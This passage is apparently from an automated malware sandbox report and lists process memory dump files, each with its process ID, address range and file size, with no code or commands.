memory/5056-176-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/5056-171-0x000000006FE40000-0x000000006FFC6000-memory.dmpFilesize
1.5MB
-
memory/5056-172-0x000000006FE40000-0x000000006FFC6000-memory.dmpFilesize
1.5MB
-
memory/5056-170-0x000000006FE40000-0x000000006FFC6000-memory.dmpFilesize
1.5MB
-
memory/5056-153-0x0000000000000000-mapping.dmp
-
memory/5056-174-0x000000006B280000-0x000000006B2A6000-memory.dmpFilesize
152KB
-
memory/5056-175-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/5056-178-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/5056-168-0x000000006B440000-0x000000006B4CF000-memory.dmpFilesize
572KB
-
memory/5056-177-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/5124-280-0x0000000000000000-mapping.dmp
-
memory/5164-379-0x0000000002380000-0x0000000002381000-memory.dmpFilesize
4KB
-
memory/5164-499-0x0000000002384000-0x0000000002386000-memory.dmpFilesize
8KB
-
memory/5164-394-0x0000000002382000-0x0000000002383000-memory.dmpFilesize
4KB
-
memory/5164-403-0x0000000002383000-0x0000000002384000-memory.dmpFilesize
4KB
-
memory/5192-290-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/5192-287-0x0000000000000000-mapping.dmp
-
memory/5248-513-0x00000000016C0000-0x0000000001A16000-memory.dmpFilesize
3.3MB
-
memory/5248-555-0x00000000013D0000-0x00000000013E1000-memory.dmpFilesize
68KB
-
memory/5256-493-0x0000000005DB0000-0x0000000005DB1000-memory.dmpFilesize
4KB
-
memory/5312-489-0x0000000000380000-0x00000000003A9000-memory.dmpFilesize
164KB
-
memory/5312-293-0x0000000000000000-mapping.dmp
-
memory/5312-530-0x0000000004740000-0x0000000004A96000-memory.dmpFilesize
3.3MB
-
memory/5312-310-0x00000000020A0000-0x00000000020A1000-memory.dmpFilesize
4KB
-
memory/5312-485-0x0000000000A80000-0x0000000000A99000-memory.dmpFilesize
100KB
-
memory/5384-297-0x0000000000000000-mapping.dmp
-
memory/5396-398-0x00000000049E0000-0x00000000049E1000-memory.dmpFilesize
4KB
-
memory/5396-351-0x0000000000000000-mapping.dmp
-
memory/5472-364-0x0000000000000000-mapping.dmp
-
memory/5516-308-0x0000000000000000-mapping.dmp
-
memory/5580-346-0x0000000004980000-0x0000000004981000-memory.dmpFilesize
4KB
-
memory/5580-314-0x0000000000000000-mapping.dmp
-
memory/5580-320-0x0000000000010000-0x0000000000011000-memory.dmpFilesize
4KB
-
memory/5580-331-0x0000000002180000-0x0000000002181000-memory.dmpFilesize
4KB
-
memory/5600-316-0x0000000000000000-mapping.dmp
-
memory/5612-361-0x0000000000000000-mapping.dmp
-
memory/5724-360-0x0000000000000000-mapping.dmp
-
memory/5740-524-0x0000000000400000-0x000000000046D000-memory.dmpFilesize
436KB
-
memory/5772-324-0x0000000000000000-mapping.dmp
-
memory/5800-338-0x0000000000900000-0x0000000000901000-memory.dmpFilesize
4KB
-
memory/5800-330-0x0000000000000000-mapping.dmp
-
memory/5808-389-0x0000000004E50000-0x0000000004EEC000-memory.dmpFilesize
624KB
-
memory/5808-359-0x0000000000000000-mapping.dmp
-
memory/5816-329-0x0000000000000000-mapping.dmp
-
memory/5848-506-0x0000000005EC0000-0x0000000005EC1000-memory.dmpFilesize
4KB
-
memory/5848-357-0x0000000000000000-mapping.dmp
-
memory/5860-332-0x0000000000000000-mapping.dmp
-
memory/5864-535-0x00000000053E0000-0x00000000053E1000-memory.dmpFilesize
4KB
-
memory/5904-363-0x0000000000000000-mapping.dmp
-
memory/5920-358-0x0000000000000000-mapping.dmp
-
memory/5920-469-0x0000000005370000-0x0000000005371000-memory.dmpFilesize
4KB
-
memory/5924-412-0x00000000054E0000-0x00000000054E1000-memory.dmpFilesize
4KB
-
memory/5924-342-0x0000000000000000-mapping.dmp
-
memory/6020-547-0x000000001AEB0000-0x000000001AEB2000-memory.dmpFilesize
8KB
-
memory/6176-540-0x0000000000760000-0x0000000000761000-memory.dmpFilesize
4KB
-
memory/6520-564-0x0000000002910000-0x0000000002912000-memory.dmpFilesize
8KB
-
memory/6732-570-0x0000000000980000-0x0000000000982000-memory.dmpFilesize
8KB